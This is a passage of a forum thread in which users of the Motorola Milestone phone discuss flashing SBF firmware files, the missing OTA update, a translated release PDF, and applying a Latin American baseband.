I didn't have the 2.1 sbf. I am downloading atm. Will let you know if i am successful.

Update
No OTA update. No update via software update as well.

Vaporware

sileshn said:
I didn't have the 2.1 sbf. I am downloading atm. Will let you know if i am successful.
Click to expand...
Click to collapse
i was saying OTA update, but you already answer me on the next post.
dammed! we will need for some SBF avalible.

I have SBF flashed and connect through Moto software update but it said No update available. I am from Singapore.

everyone flashed yet?
what kernel using in this fw?

That PDF has been posted for several days already!!!

Any updates on this ?

shreyas99 said:
Any updates on this ?
Click to expand...
Click to collapse
Yes, here:
http://forum.xda-developers.com/showpost.php?p=10851254&postcount=32

I was just passing an English translation of a Spanish release and forgot to give credit where do: Link (to Spanish pdf) originally Posted by DiaboluZ (here) View Post From nadbalak/comments homepage...
I only know now the puff in the piece is probably a little premature but it seems worth checking back frequently. When it does materialize it would be nice to squeeze an sbf out of it... and off to the boys in the kitchen.
PK

pk2 said:
I was just passing an English translation of a Spanish release and forgot to give credit where do: Link (to Spanish pdf) originally Posted by DiaboluZ (here) View Post From nadbalak/comments homepage...
I only know now the puff in the piece is probably a little premature but it seems worth checking back frequently. When it does materialize it would be nice to squeeze an sbf out of it... and off to the boys in the kitchen.
PK
Click to expand...
Click to collapse
???
DiaboluZ post: 23 th Jan 08:03 PM
My post: 21st Jan 10:08 AM

I have a Milestone A853 from Venezuela which uses 850/1900MHz for 3G.
Is it possible to flash the RTEU sbf and then apply the LatAm baseband through OR???
I want to flash that ROM and check for updates.
Cheers!